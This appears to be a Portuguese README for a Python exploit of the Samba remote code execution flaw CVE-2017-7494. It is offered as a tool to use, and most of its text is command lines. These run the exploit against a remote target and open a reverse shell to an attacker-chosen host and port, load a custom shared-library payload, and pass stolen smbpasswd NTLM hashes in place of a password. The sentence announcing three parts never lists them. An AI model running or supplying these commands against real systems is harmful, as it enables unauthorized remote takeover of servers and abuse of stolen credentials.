
Exploit em Python para CVE-2017-7494
Exploit remoto para a vulnerabilidade SAMBA CVE-2017-7494, também conhecida como is_know_pipename!
Este exploit é dividido em 3 partes:
Desde que o alvo seja vulnerável e o payload seja correto para o sistema operacional e arquitetura do alvo, o exploit é bastante confiável.
Execute o exploit contra o seu alvo e aguarde até que o shell apareça:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
Para a versão do samba 3.5.0 > 3.6.0, você só precisa adicionar o argumento -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Execute seu próprio .so personalizado
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
Para porta samba personalizada, use o argumento -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
Caso você encontre hashes smbpasswd e não consiga quebrá-los, você pode agora passar o hash usando o argumento --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
Este repositório é inspirado no repositório: joxeankoret/exploit-CVE-2017-7494 e Archivaldo